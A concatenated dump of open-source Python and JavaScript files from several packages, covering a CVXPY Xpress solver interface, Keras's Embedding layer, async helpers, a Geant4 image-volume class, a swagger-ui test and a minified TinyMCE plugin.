self.prob_.chgcoltype(data[s.BOOL_IDX] + data[s.INT_IDX],
'B' * len(data[s.BOOL_IDX]) + 'I' * len(data[s.INT_IDX]))
currow = nrows
iCone = 0
auxVars = set(range(nOrigVar, len(c)))
# Conic constraints
#
# Quadratic objective and constraints fall in this category,
# as all quadratic stuff is converted into a cone via a linear transformation
for k in dims[s.SOC_DIM]:
# k is the size of the i-th cone, where i is the index
# within dims [s.SOC_DIM]. The cone variables in
# CVXOPT, apparently, are separate variables that are
# marked as conic but not shown in a cone explicitly.
A = data[s.A][currow: currow + k].tocsr()
b = data[s.B][currow: currow + k]
currow += k
# Create new (cone) variables and add them to the problem
conevar = np.array([xp.var(name='cX{0:d}_{1:d}'.format(iCone, i),
lb=-xp.infinity if i > 0 else 0)
for i in range(k)])
self.prob_.addVariable(conevar)
initrow = self.prob_.attributes.rows
mstart = makeMstart(A, k, 0)
trNames = ['linT_qc{0:d}_{1:d}'.format(iCone, i) for i in range(k)]
# Linear transformation for cone variables <--> original variables
self.prob_.addrows(['E'] * k, # qrtypes
b, # rhs
mstart, # mstart
A.indices[A.data != 0], # ind
A.data[A.data != 0], # dmatval
names=trNames) # row names
self.prob_.chgmcoef([initrow + i for i in range(k)],
conevar, [1] * k)
conename = 'cone_qc{0:d}'.format(iCone)
# Real cone on the cone variables (if k == 1 there's no
# need for this constraint as y**2 >= 0 is redundant)
if k > 1:
self.prob_.addConstraint(
xp.constraint(constraint=xp.Sum
(conevar[i]**2 for i in range(1, k))
<= conevar[0] ** 2,
name=conename))
auxInd = list(set(A.indices) & auxVars)
if len(auxInd) > 0:
group = varGroups[varnames[auxInd[0]]]
for i in trNames:
transf2Orig[i] = group
transf2Orig[conename] = group
iCone += 1
# End of the conditional (warm-start vs. no warm-start) code,
# set options, solve, and report.
# Set options
#
# The parameter solver_opts is a dictionary that contains only
# one key, 'solver_opt', and its value is a dictionary
# {'control': value}, matching perfectly the format used by
# the Xpress Python interface.
self.prob_.setControl({i: solver_opts[i] for i in solver_opts
if i in xp.controls.__dict__})
if 'bargaptarget' not in solver_opts:
self.prob_.controls.bargaptarget = 1e-30
if 'feastol' not in solver_opts:
self.prob_.controls.feastol = 1e-9
# If option given, write file before solving
if 'write_mps' in solver_opts:
self.prob_.write(solver_opts['write_mps'])
# Solve
self.prob_.solve()
results_dict = {
'problem': self.prob_,
'status': self.prob_.getProbStatus(),
'obj_value': self.prob_.getObjVal(),
}
status_map_lp, status_map_mip = get_status_maps()
if 'mip_' in self.prob_.getProbStatusString():
status = status_map_mip[results_dict['status']]
else:
status = status_map_lp[results_dict['status']]
results_dict[s.XPRESS_TROW] = transf2Orig
results_dict[s.XPRESS_IIS] = None # Return no IIS if problem is feasible
if status in s.SOLUTION_PRESENT:
results_dict['x'] = self.prob_.getSolution()
if not (data[s.BOOL_IDX] or data[s.INT_IDX]):
results_dict['y'] = - np.array(self.prob_.getDual())
elif status == s.INFEASIBLE and 'save_iis' in solver_opts and solver_opts['save_iis'] != 0:
# Retrieve all IIS. For LPs there can be more than one,
# but for QCQPs there is only support for one IIS.
iisIndex = 0
self.prob_.iisfirst(0) # compute all IIS
row, col, rtype, btype, duals, rdcs, isrows, icols = [], [], [], [], [], [], [], []
self.prob_.getiisdata(0, row, col, rtype, btype, duals, rdcs, isrows, icols)
origrow = []
for iRow in row:
if iRow.name in transf2Orig:
name = transf2Orig[iRow.name]
else:
name = iRow.name
if name not in origrow:
origrow.append(name)
results_dict[s.XPRESS_IIS] = [{'orig_row': origrow,
'row': row,
'col': col,
'rtype': rtype,
'btype': btype,
'duals': duals,
'redcost': rdcs,
'isolrow': isrows,
'isolcol': icols}]
while self.prob_.iisnext() == 0 and (solver_opts['save_iis'] < 0 or
iisIndex < solver_opts['save_iis']):
iisIndex += 1
self.prob_.getiisdata(iisIndex,
row, col, rtype, btype, duals, rdcs, isrows, icols)
results_dict[s.XPRESS_IIS].append((
row, col, rtype, btype, duals, rdcs, isrows, icols))
# Generate solution.
solution = {}
status_map_lp, status_map_mip = get_status_maps()
if data[s.BOOL_IDX] or data[s.INT_IDX]:
solution[s.STATUS] = status_map_mip[results_dict['status']]
else:
solution[s.STATUS] = status_map_lp[results_dict['status']]
if solution[s.STATUS] in s.SOLUTION_PRESENT:
solution[s.PRIMAL] = results_dict['x']
solution[s.VALUE] = results_dict['obj_value']
if not (data[s.BOOL_IDX] or data[s.INT_IDX]):
solution[s.EQ_DUAL] = results_dict['y'][0:dims[s.EQ_DIM]]
solution[s.INEQ_DUAL] = results_dict['y'][dims[s.EQ_DIM]:]
solution[s.XPRESS_IIS] = results_dict[s.XPRESS_IIS]
solution[s.XPRESS_TROW] = results_dict[s.XPRESS_TROW]
solution['getObjVal'] = self.prob_.getObjVal()
solution[s.SOLVE_TIME] = self.prob_.attributes.time
del self.prob_
return solution
def get_status_maps():
"""Create status maps from Xpress to CVXPY
"""
import xpress as xp
# Map of Xpress' LP status to CVXPY status.
status_map_lp = {
xp.lp_unstarted: s.SOLVER_ERROR,
xp.lp_optimal: s.OPTIMAL,
xp.lp_infeas: s.INFEASIBLE,
xp.lp_cutoff: s.OPTIMAL_INACCURATE,
xp.lp_unfinished: s.OPTIMAL_INACCURATE,
xp.lp_unbounded: s.UNBOUNDED,
xp.lp_cutoff_in_dual: s.OPTIMAL_INACCURATE,
xp.lp_unsolved: s.OPTIMAL_INACCURATE,
xp.lp_nonconvex: s.SOLVER_ERROR
}
# Same map, for MIPs
status_map_mip = {
xp.mip_not_loaded: s.SOLVER_ERROR,
xp.mip_lp_not_optimal: s.SOLVER_ERROR,
xp.mip_lp_optimal: s.SOLVER_ERROR,
xp.mip_no_sol_found: s.SOLVER_ERROR,
xp.mip_solution: s.OPTIMAL_INACCURATE,
xp.mip_infeas: s.INFEASIBLE,
xp.mip_optimal: s.OPTIMAL,
xp.mip_unbounded: s.UNBOUNDED
}
return (status_map_lp, status_map_mip)
|
PypiClean
|
/pywwt-0.21.0.tar.gz/pywwt-0.21.0/docs/api/pywwt.Polygon.rst
|
Polygon
=======
.. currentmodule:: pywwt
.. autoclass:: Polygon
:show-inheritance:
.. rubric:: Attributes Summary
.. autosummary::
~Polygon.fill
~Polygon.fill_color
~Polygon.line_color
~Polygon.line_width
~Polygon.shape
.. rubric:: Methods Summary
.. autosummary::
~Polygon.add_point
.. rubric:: Attributes Documentation
.. autoattribute:: fill
.. autoattribute:: fill_color
.. autoattribute:: line_color
.. autoattribute:: line_width
.. autoattribute:: shape
.. rubric:: Methods Documentation
.. automethod:: add_point
|
PypiClean
|
/hotpot_km-0.2.2.tar.gz/hotpot_km-0.2.2/hotpot_km/async_utils.py
|
import asyncio
import sys
import inspect
from typing import Callable, Awaitable, Any, Union
# Store the original tornado.conucrrent.Future, as it will likely be patched later
try:
import tornado.concurrent
_orig_tc_future = tornado.concurrent.Future
except ImportError:
_orig_tc_future = None
async def wait_before(delay, aw):
await asyncio.sleep(delay)
return await aw
async def await_then_kill(km, aw_id):
return await km.shutdown_kernel(await aw_id)
def ensure_event_loop():
try:
loop = asyncio.get_event_loop()
except RuntimeError:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop
def check_ipython() -> None:
# original from vaex/asyncio.py
IPython = sys.modules.get("IPython")
if IPython:
IPython_version = tuple(map(int, IPython.__version__.split("."))) # type: ignore
if IPython_version < (7, 0, 0):
raise RuntimeError(
f"You are using IPython {IPython.__version__} " # type: ignore
"while we require 7.0.0+, please update IPython"
)
def check_patch_tornado() -> None:
"""If tornado is imported, add the patched asyncio.Future to its tuple of acceptable Futures"""
# original from vaex/asyncio.py
if "tornado" in sys.modules:
import tornado.concurrent # type: ignore
if asyncio.Future not in tornado.concurrent.FUTURES:
tornado.concurrent.FUTURES = tornado.concurrent.FUTURES + (
asyncio.Future,
) # type: ignore
def just_run(coro: Awaitable) -> Any:
"""Make the coroutine run, even if there is an event loop running (using nest_asyncio)"""
if not inspect.isawaitable(coro):
return coro
if _orig_tc_future and isinstance(coro, _orig_tc_future):
import tornado.platform.asyncio
coro = tornado.platform.asyncio.to_asyncio_future(coro)
# original from vaex/asyncio.py
loop = asyncio._get_running_loop()
if loop is None:
had_running_loop = False
try:
loop = asyncio.get_event_loop()
except RuntimeError:
# we can still get 'There is no current event loop in ...'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
else:
had_running_loop = True
if had_running_loop:
# if there is a running loop, we patch using nest_asyncio
# to have reentrant event loops
check_ipython()
import nest_asyncio
nest_asyncio.apply()
check_patch_tornado()
return loop.run_until_complete(coro)
def run_sync(coro: Callable) -> Callable:
"""Runs a coroutine and blocks until it has executed.
An event loop is created if no one already exists. If an event loop is
already running, this event loop execution is nested into the already
running one if `nest_asyncio` is set to True.
Parameters
----------
coro : coroutine
The coroutine to be executed.
Returns
-------
result :
Whatever the coroutine returns.
"""
def wrapped(*args, **kwargs):
return just_run(coro(*args, **kwargs))
wrapped.__doc__ = coro.__doc__
return wrapped
async def ensure_async(obj: Union[Awaitable, Any]) -> Any:
"""Convert a non-awaitable object to a coroutine if needed,
and await it if it was not already awaited.
"""
if inspect.isawaitable(obj):
try:
result = await obj
except RuntimeError as e:
if str(e) == "cannot reuse already awaited coroutine":
# obj is already the coroutine's result
return obj
raise
return result
# obj doesn't need to be awaited
return obj
|
PypiClean
|
/mis_modulos-0.1.tar.gz/mis_modulos-0.1/keras/layers/core/embedding.py
|
import tensorflow.compat.v2 as tf
from keras import backend
from keras import constraints
from keras import initializers
from keras import regularizers
from keras.dtensor import utils
from keras.engine import base_layer_utils
from keras.engine.base_layer import Layer
from keras.utils import tf_utils
# isort: off
from tensorflow.python.util.tf_export import keras_export
@keras_export("keras.layers.Embedding")
class Embedding(Layer):
"""Turns positive integers (indexes) into dense vectors of fixed size.
e.g. `[[4], [20]] -> [[0.25, 0.1], [0.6, -0.2]]`
This layer can only be used on positive integer inputs of a fixed range. The
`tf.keras.layers.TextVectorization`, `tf.keras.layers.StringLookup`,
and `tf.keras.layers.IntegerLookup` preprocessing layers can help prepare
inputs for an `Embedding` layer.
This layer accepts `tf.Tensor` and `tf.RaggedTensor` inputs. It cannot be
called with `tf.SparseTensor` input.
Example:
>>> model = tf.keras.Sequential()
>>> model.add(tf.keras.layers.Embedding(1000, 64, input_length=10))
>>> # The model will take as input an integer matrix of size (batch,
>>> # input_length), and the largest integer (i.e. word index) in the input
>>> # should be no larger than 999 (vocabulary size).
>>> # Now model.output_shape is (None, 10, 64), where `None` is the batch
>>> # dimension.
>>> input_array = np.random.randint(1000, size=(32, 10))
>>> model.compile('rmsprop', 'mse')
>>> output_array = model.predict(input_array)
>>> print(output_array.shape)
(32, 10, 64)
Args:
input_dim: Integer. Size of the vocabulary,
i.e. maximum integer index + 1.
output_dim: Integer. Dimension of the dense embedding.
embeddings_initializer: Initializer for the `embeddings`
matrix (see `keras.initializers`).
embeddings_regularizer: Regularizer function applied to
the `embeddings` matrix (see `keras.regularizers`).
embeddings_constraint: Constraint function applied to
the `embeddings` matrix (see `keras.constraints`).
mask_zero: Boolean, whether or not the input value 0 is a special
"padding" value that should be masked out. This is useful when using
recurrent layers which may take variable length input. If this is
`True`, then all subsequent layers in the model need to support masking
or an exception will be raised. If mask_zero is set to True, as a
consequence, index 0 cannot be used in the vocabulary (input_dim should
equal size of vocabulary + 1).
input_length: Length of input sequences, when it is constant.
This argument is required if you are going to connect
`Flatten` then `Dense` layers upstream
(without it, the shape of the dense outputs cannot be computed).
Input shape:
2D tensor with shape: `(batch_size, input_length)`.
Output shape:
3D tensor with shape: `(batch_size, input_length, output_dim)`.
**Note on variable placement:**
By default, if a GPU is available, the embedding matrix will be placed on
the GPU. This achieves the best performance, but it might cause issues:
- You may be using an optimizer that does not support sparse GPU kernels.
In this case you will see an error upon training your model.
- Your embedding matrix may be too large to fit on your GPU. In this case
you will see an Out Of Memory (OOM) error.
In such cases, you should place the embedding matrix on the CPU memory.
You can do so with a device scope, as such:
```python
with tf.device('cpu:0'):
embedding_layer = Embedding(...)
embedding_layer.build()
```
The pre-built `embedding_layer` instance can then be added to a `Sequential`
model (e.g. `model.add(embedding_layer)`), called in a Functional model
(e.g. `x = embedding_layer(x)`), or used in a subclassed model.
"""
@utils.allow_initializer_layout
def __init__(
self,
input_dim,
output_dim,
embeddings_initializer="uniform",
embeddings_regularizer=None,
activity_regularizer=None,
embeddings_constraint=None,
mask_zero=False,
input_length=None,
**kwargs,
):
if "input_shape" not in kwargs:
if input_length:
kwargs["input_shape"] = (input_length,)
else:
kwargs["input_shape"] = (None,)
if input_dim <= 0 or output_dim <= 0:
raise ValueError(
"Both `input_dim` and `output_dim` should be positive, "
f"Received input_dim = {input_dim} "
f"and output_dim = {output_dim}"
)
if (
not base_layer_utils.v2_dtype_behavior_enabled()
and "dtype" not in kwargs
):
# In TF1, the dtype defaults to the input dtype which is typically
# int32, so explicitly set it to floatx
kwargs["dtype"] = backend.floatx()
# We set autocast to False, as we do not want to cast floating- point
# inputs to self.dtype. In call(), we cast to int32, and casting to
# self.dtype before casting to int32 might cause the int32 values to be
# different due to a loss of precision.
kwargs["autocast"] = False
super().__init__(**kwargs)
self.input_dim = input_dim
self.output_dim = output_dim
self.embeddings_initializer = initializers.get(embeddings_initializer)
self.embeddings_regularizer = regularizers.get(embeddings_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.embeddings_constraint = constraints.get(embeddings_constraint)
self.mask_zero = mask_zero
self.supports_masking = mask_zero
self.input_length = input_length
@tf_utils.shape_type_conversion
def build(self, input_shape=None):
self.embeddings = self.add_weight(
shape=(self.input_dim, self.output_dim),
initializer=self.embeddings_initializer,
name="embeddings",
regularizer=self.embeddings_regularizer,
constraint=self.embeddings_constraint,
experimental_autocast=False,
)
self.built = True
def compute_mask(self, inputs, mask=None):
if not self.mask_zero:
return None
return tf.not_equal(inputs, 0)
@tf_utils.shape_type_conversion
def compute_output_shape(self, input_shape):
if self.input_length is None:
return input_shape + (self.output_dim,)
else:
# input_length can be tuple if input is 3D or higher
if isinstance(self.input_length, (list, tuple)):
in_lens = list(self.input_length)
else:
in_lens = [self.input_length]
if len(in_lens) != len(input_shape) - 1:
raise ValueError(
f'"input_length" is {self.input_length}, but received '
f"input has shape {input_shape}"
)
else:
for i, (s1, s2) in enumerate(zip(in_lens, input_shape[1:])):
if s1 is not None and s2 is not None and s1 != s2:
raise ValueError(
f'"input_length" is {self.input_length}, but '
f"received input has shape {input_shape}"
)
elif s1 is None:
in_lens[i] = s2
return (input_shape[0],) + tuple(in_lens) + (self.output_dim,)
def call(self, inputs):
dtype = backend.dtype(inputs)
if dtype != "int32" and dtype != "int64":
inputs = tf.cast(inputs, "int32")
out = tf.nn.embedding_lookup(self.embeddings, inputs)
if (
self._dtype_policy.compute_dtype
!= self._dtype_policy.variable_dtype
):
# Instead of casting the variable as in most layers, cast the
# output, as this is mathematically equivalent but is faster.
out = tf.cast(out, self._dtype_policy.compute_dtype)
return out
def get_config(self):
config = {
"input_dim": self.input_dim,
"output_dim": self.output_dim,
"embeddings_initializer": initializers.serialize(
self.embeddings_initializer
),
"embeddings_regularizer": regularizers.serialize(
self.embeddings_regularizer
),
"activity_regularizer": regularizers.serialize(
self.activity_regularizer
),
"embeddings_constraint": constraints.serialize(
self.embeddings_constraint
),
"mask_zero": self.mask_zero,
"input_length": self.input_length,
}
base_config = super().get_config()
return dict(list(base_config.items()) + list(config.items()))
|
PypiClean
|
/keystack-0.12.0.tar.gz/keystack-0.12.0/Keystack/KeystackUI/static/swagger-ui-4.15.2/test/e2e-selenium/scenarios/features/parameter-example-rendering.js
|
describe("parameter example rendering", function () {
describe("swagger 2.0", () => {
beforeEach(function (client, done) {
client
.url("localhost:3230")
.page.main()
client.waitForElementVisible(".download-url-input:not([disabled])", 5000)
.clearValue(".download-url-input")
.setValue(".download-url-input", "/test-specs/features/example.swagger.yaml")
.click("button.download-url-button")
.waitForElementVisible(".opblock", 10000)
.click("#operations-default-put_one")
.waitForElementVisible("#operations-default-put_one.is-open", 5000)
done()
})
afterEach(function (client, done) {
done()
})
it("reveals a string parameter's example when viewing that parameter", function (client) {
client.waitForElementVisible(".opblock-tag-section", 10000)
.assert.containsText(".opblock-summary-path span", "/one")
.click(".opblock")
.waitForElementVisible(".opblock.is-open", 5000)
.pause(500)
.assert.containsText(`tr[data-param-name="ValidParam"]`, `12345`)
client.end()
})
})
describe("openapi 3.0", () => {
beforeEach(function (client, done) {
client
.url("localhost:3230")
.page.main()
client.waitForElementVisible(".download-url-input:not([disabled])", 5000)
.clearValue(".download-url-input")
.setValue(".download-url-input", "/test-specs/features/example.openapi.yaml")
.click("button.download-url-button")
.waitForElementVisible(".opblock-summary-description", 10000)
.click("#operations-agent-editAgent")
.waitForElementVisible("#operations-agent-editAgent.is-open", 5000)
done()
})
afterEach(function (client, done) {
done()
})
it("reveals a string parameter's example when viewing that parameter", function (client) {
it("should respect a primitive example value", function(client) {
client
.assert.value(
`div.parameters-container > div > table > tbody > tr > td.col.parameters-col_description > input[type="text"]`,
`12345`
)
client.end()
})
})
})
})
|
PypiClean
|
/gam-gate-0.3.5.tar.gz/gam-gate-0.3.5/gam_gate/geometry/ImageVolume.py
|
import gam_gate as gam
import gam_g4 as g4
import itk
import numpy as np
class ImageVolume(gam.VolumeBase):
"""
Store information about a voxelized volume
"""
type_name = 'Image'
@staticmethod
def set_default_user_info(user_info):
gam.VolumeBase.set_default_user_info(user_info)
user_info.image = None
user_info.material = 'G4_AIR'
user_info.voxel_materials = [[None, 'G4_AIR']]
user_info.dump_label_image = None
def __init__(self, user_info):
super().__init__(user_info)
# the (itk) image
self.image = None
# the list of regions
self.g4_regions = []
def __del__(self):
pass
def construct(self, vol_manager):
# read image
self.image = itk.imread(gam.check_filename_type(self.user_info.image))
size_pix = np.array(itk.size(self.image)).astype(int)
spacing = np.array(self.image.GetSpacing())
size_mm = size_pix * spacing
# shorter coding
name = self.user_info.name
hsize_mm = size_mm / 2.0
hspacing = spacing / 2.0
# build the bounding box volume
self.g4_solid = g4.G4Box(name, hsize_mm[0], hsize_mm[1], hsize_mm[2])
def_mat = vol_manager.find_or_build_material(self.user_info.material)
self.g4_logical_volume = g4.G4LogicalVolume(self.g4_solid, def_mat, name)
# param Y
self.g4_solid_y = g4.G4Box(name + '_Y', hsize_mm[0], hspacing[1], hsize_mm[2])
self.g4_logical_y = g4.G4LogicalVolume(self.g4_solid_y, def_mat, name + '_log_Y')
self.g4_physical_y = g4.G4PVReplica(name + '_Y',
self.g4_logical_y,
self.g4_logical_volume,
g4.EAxis.kYAxis,
size_pix[1], # nReplicas
spacing[1], # width
0.0) # offset
# param X
self.g4_solid_x = g4.G4Box(name + '_X', hspacing[0], hspacing[1], hsize_mm[2])
self.g4_logical_x = g4.G4LogicalVolume(self.g4_solid_x, def_mat, name + '_log_X')
self.g4_physical_x = g4.G4PVReplica(name + '_X',
self.g4_logical_x,
self.g4_logical_y,
g4.EAxis.kXAxis,
size_pix[0], spacing[0], 0.0)
# param Z
self.g4_solid_z = g4.G4Box(name + '_Z', hspacing[0], hspacing[1], hspacing[2])
self.g4_logical_z = g4.G4LogicalVolume(self.g4_solid_z, def_mat, name + '_log_Z')
self.initialize_image_parameterisation()
self.g4_physical_z = g4.G4PVParameterised(name + '_Z',
self.g4_logical_z,
self.g4_logical_x,
g4.EAxis.kZAxis, # g4.EAxis.kUndefined, ## FIXME ?
size_pix[2],
self.g4_voxel_param,
False) # overlaps checking
# find the mother's logical volume
vol = self.user_info
if vol.mother:
st = g4.G4LogicalVolumeStore.GetInstance()
mother_logical = st.GetVolume(vol.mother, False)
else:
mother_logical = None
# consider the 3D transform -> helpers_transform.
transform = gam.get_vol_g4_transform(vol)
self.g4_physical_volume = g4.G4PVPlacement(transform,
self.g4_logical_volume, # logical volume
vol.name, # volume name
mother_logical, # mother volume or None if World
False, # no boolean operation
0, # copy number
True) # overlaps checking
# construct region
# not clear -> should we create region for all other LV ?
# (seg fault if region for g4_logical_z)
self.add_region(self.g4_logical_volume)
def add_region(self, lv):
name = lv.GetName()
rs = g4.G4RegionStore.GetInstance()
r = rs.FindOrCreateRegion(name)
self.g4_regions.append(r)
lv.SetRegion(r)
r.AddRootLogicalVolume(lv, True)
def initialize_image_parameterisation(self):
"""
From the input image, a label image is computed with each label
associated with a material.
The label image is initialized with label 0, corresponding to the first material
Correspondence from voxel value to material is given by a list of interval [min_value, max_value, material_name]
all pixels with values between min (included) and max (non included)
will be associated with the given material
"""
self.g4_voxel_param = g4.GamImageNestedParameterisation()
# create image with same size
info = gam.read_image_info(str(self.user_info.image))
self.py_image = gam.create_3d_image(info.size, info.spacing, pixel_type='unsigned short', fill_value=0)
# sort intervals of voxels_values <-> materials
mat = self.user_info.voxel_materials
interval_values_inf = [row[0] for row in mat]
interval_values_sup = [row[1] for row in mat]
interval_materials = [row[2] for row in mat]
indexes = np.argsort(interval_values_inf)
interval_values_inf = list(np.array(interval_values_inf)[indexes])
interval_values_sup = list(np.array(interval_values_sup)[indexes])
interval_materials = list(np.array(interval_materials)[indexes])
# build the material
for m in interval_materials:
self.simulation.volume_manager.find_or_build_material(m)
# compute list of labels and material
self.final_materials = []
# the image is initialized with the label zero, the first material
self.final_materials.append(self.user_info.material)
# convert interval to material id
input = itk.array_view_from_image(self.image)
output = itk.array_view_from_image(self.py_image)
# the final list of materials is packed (same label even if
# there are several intervals with the same material)
self.final_materials = []
for inf, sup, m in zip(interval_values_inf, interval_values_sup, interval_materials):
if m in self.final_materials:
l = self.final_materials.index(m)
else:
self.final_materials.append(m)
l = len(self.final_materials) - 1
output[(input >= inf) & (input < sup)] = l
# dump label image ?
if self.user_info.dump_label_image:
self.py_image.SetOrigin(info.origin)
itk.imwrite(self.py_image, str(self.user_info.dump_label_image))
# compute image origin
size_pix = np.array(itk.size(self.py_image))
spacing = np.array(self.py_image.GetSpacing())
orig = -(size_pix * spacing) / 2.0 + spacing / 2.0
self.py_image.SetOrigin(orig)
# send image to cpp size
gam.update_image_py_to_cpp(self.py_image, self.g4_voxel_param.cpp_edep_image, True)
# initialize parametrisation
self.g4_voxel_param.initialize_image()
self.g4_voxel_param.initialize_material(self.final_materials)
|
PypiClean
|
/django_skote-0.0.9-py3-none-any.whl/django_skote/static/django_skote/libs/tinymce/plugins/textpattern/plugin.min.js
|
!function(){"use strict";var t=tinymce.util.Tools.resolve("tinymce.PluginManager"),u=function(){return(u=Object.assign||function(t){for(var n,r=1,e=arguments.length;r<e;r++)for(var o in n=arguments[r])Object.prototype.hasOwnProperty.call(n,o)&&(t[o]=n[o]);return t}).apply(this,arguments)};function a(t,n,r){if(r||2===arguments.length)for(var e,o=0,a=n.length;o<a;o++)!e&&o in n||((e=e||Array.prototype.slice.call(n,0,o))[o]=n[o]);return t.concat(e||Array.prototype.slice.call(n))}function n(e){return function(t){return r=typeof(n=t),(null===n?"null":"object"==r&&(Array.prototype.isPrototypeOf(n)||n.constructor&&"Array"===n.constructor.name)?"array":"object"==r&&(String.prototype.isPrototypeOf(n)||n.constructor&&"String"===n.constructor.name)?"string":r)===e;var n,r}}function e(){}function i(t){return function(){return t}}function o(t){return t}function r(){return m}var f=n("string"),c=n("object"),s=n("array"),l=i(!1),d=i(!0),m={fold:function(t,n){return t()},isSome:l,isNone:d,getOr:o,getOrThunk:g,getOrDie:function(t){throw new Error(t||"error: getOrDie called on none.")},getOrNull:i(null),getOrUndefined:i(void 0),or:o,orThunk:g,map:r,each:e,bind:r,exists:l,forall:d,filter:function(){return m},toArray:function(){return[]},toString:i("none()")};function g(t){return t()}function p(t,n){return-1<E.call(t,n)}function h(t,n){for(var r=t.length,e=new Array(r),o=0;o<r;o++){var a=t[o];e[o]=n(a,o)}return e}function v(t,n){for(var r=0,e=t.length;r<e;r++)n(t[r],r)}function y(t,n){for(var r=[],e=0,o=t.length;e<o;e++){var a=t[e];n(a,e)&&r.push(a)}return r}function b(t,e,o){return function(t){for(var n,r=t.length-1;0<=r;r--)n=t[r],o=e(o,n,r)}(t),o}function k(t,n){for(var r=0,e=t.length;r<e;++r)if(!0!==n(t[r],r))return;return 1}var O=function(r){function t(){return o}function n(t){return t(r)}var e=i(r),o={fold:function(t,n){return n(r)},isSome:d,isNone:l,getOr:e,getOrThunk:e,getOrDie:e,getOrNull:e,getOrUndefined:e,or:t,orThunk:t,map:function(t){return O(t(r))},each:function(t){t(r)},bind:n,exists:n,forall:n,filter:function(t){return t(r)?o:m},toArray:function(){return[r]},toString:function(){return"some("+r+")"}};return o},w={some:O,none:r,from:function(t){return null==t?m:O(t)}},C=Array.prototype.slice,E=Array.prototype.indexOf,x=Object.keys,R=Object.hasOwnProperty;function T(t){var n=[],r=[];return v(t,function(t){t.fold(function(t){n.push(t)},function(t){r.push(t)})}),{errors:n,values:r}}function P(t){return"inline-command"===t.type||"inline-format"===t.type}function N(t){return"block-command"===t.type||"block-format"===t.type}function S(o){function a(t){return ut.error({message:t,pattern:o})}function t(t,n,r){if(void 0===o.format)return void 0!==o.cmd?f(o.cmd)?ut.value(r(o.cmd,o.value)):a(t+" pattern has non-string `cmd` parameter"):a(t+" pattern is missing both `format` and `cmd` parameters");var e=void 0;if(s(o.format)){if(!k(o.format,f))return a(t+" pattern has non-string items in the `format` array");e=o.format}else{if(!f(o.format))return a(t+" pattern has non-string `format` parameter");e=[o.format]}return ut.value(n(e))}if(!c(o))return a("Raw pattern is not an object");if(!f(o.start))return a("Raw pattern is missing `start` parameter");if(void 0===o.end)return void 0!==o.replacement?f(o.replacement)?0===o.start.length?a("Replacement pattern has empty `start` parameter"):ut.value({type:"inline-command",start:"",end:o.start,cmd:"mceInsertContent",value:o.replacement}):a("Replacement pattern has non-string `replacement` parameter"):0===o.start.length?a("Block pattern has empty `start` parameter"):t("Block",function(t){return{type:"block-format",start:o.start,format:t[0]}},function(t,n){return{type:"block-command",start:o.start,cmd:t,value:n}});if(!f(o.end))return a("Inline pattern has non-string `end` parameter");if(0===o.start.length&&0===o.end.length)return a("Inline pattern has empty `start` and `end` parameters");var r=o.start,e=o.end;return 0===e.length&&(e=r,r=""),t("Inline",function(t){return{type:"inline-format",start:r,end:e,format:t}},function(t,n){return{type:"inline-command",start:r,end:e,cmd:t,value:n}})}function M(t){return"block-command"===t.type?{start:t.start,cmd:t.cmd,value:t.value}:"block-format"===t.type?{start:t.start,format:t.format}:"inline-command"===t.type?"mceInsertContent"===t.cmd&&""===t.start?{start:t.end,replacement:t.value}:{start:t.start,end:t.end,cmd:t.cmd,value:t.value}:"inline-format"===t.type?{start:t.start,end:t.end,format:1===t.format.length?t.format[0]:t.format}:void 0}function A(t){return{inlinePatterns:y(t,P),blockPatterns:(n=y(t,N),r=function(t,n){return t.start.length===n.start.length?0:t.start.length>n.start.length?-1:1},(e=C.call(n,0)).sort(r),e)};var n,r,e}function B(){for(var t=[],n=0;n<arguments.length;n++)t[n]=arguments[n];var r=ft.console;r&&(r.error||r.log).apply(r,t)}function D(t){var n=t.getParam("forced_root_block","p");return!1===n?"":!0===n?"p":n}function I(t,n){return{container:t,offset:n}}function j(t){return t.nodeType===Node.TEXT_NODE}function _(t,n,r,e){void 0===e&&(e=!0);var o=n.startContainer.parentNode,a=n.endContainer.parentNode;n.deleteContents(),e&&!r(n.startContainer)&&(j(n.startContainer)&&0===n.startContainer.data.length&&t.remove(n.startContainer),j(n.endContainer)&&0===n.endContainer.data.length&&t.remove(n.endContainer),pt(t,o,r),o!==a&&pt(t,a,r))}function U(t,n){var r,e=n.get(t);return s(e)&&(0<(r=e).length?w.some(r[0]):w.none()).exists(function(t){return R.call(t,"block")})}function L(t){return 0===t.start.length}function V(t,n){var r=w.from(t.dom.getParent(n.startContainer,t.dom.isBlock));return""===D(t)?r.orThunk(function(){return w.some(t.getBody())}):r}function W(n){return function(t){return n===t?-1:0}}function q(t,n,r){if(j(t)&&0<=n)return w.some(I(t,n));var e=gt(ht);return w.from(e.backwards(t,n,W(t),r)).map(function(t){return I(t.container,t.container.data.length)})}function F(t,n,r){if(j(n)&&(r<0||r>n.data.length))return[];for(var e=[r],o=n;o!==t&&o.parentNode;){for(var a=o.parentNode,i=0;i<a.childNodes.length;i++)if(a.childNodes[i]===o){e.push(i);break}o=a}return o===t?e.reverse():[]}function G(t,n,r,e,o){return{start:F(t,n,r),end:F(t,e,o)}}function H(t,n){var r=n.slice(),e=r.pop(),o=r,a=function(t,n){return t.bind(function(t){return w.from(t.childNodes[n])})},i=w.some(t);return v(o,function(t,n){i=a(i,t)}),i.bind(function(t){return j(t)&&(e<0||e>t.data.length)?w.none():w.some({node:t,offset:e})})}function J(n,r){return H(n,r.start).bind(function(t){var o=t.node,a=t.offset;return H(n,r.end).map(function(t){var n=t.node,r=t.offset,e=document.createRange();return e.setStart(o,a),e.setEnd(n,r),e})})}function K(e,o,n){!function(t,n){if(j(t)&&t.length<=0)return w.some(I(t,0));var r=gt(ht);return w.from(r.forwards(t,0,W(t),n)).map(function(t){return I(t.container,0)})}(o,o).each(function(t){var r=t.container;yt(r,n.start.length,o).each(function(t){var n=e.createRng();n.setStart(r,0),n.setEnd(t.container,t.offset),_(e,n,function(t){return t===o})})})}function X(e,a){var i=e.dom,t=e.selection.getRng();return V(e,t).filter(function(t){var n=D(e),r=""===n&&i.is(t,"body")||i.is(t,n);return null!==t&&r}).bind(function(n){var r,e=n.textContent,t=a,o=(r=e).replace("\xa0"," ");return function(t,n,r){for(var e=0,o=t.length;e<o;e++){var a=t[e];if(n(a,e))return w.some(a);if(r(a,e))break}return w.none()}(t,function(t){return 0===r.indexOf(t.start)||0===o.indexOf(t.start)},l).map(function(t){return 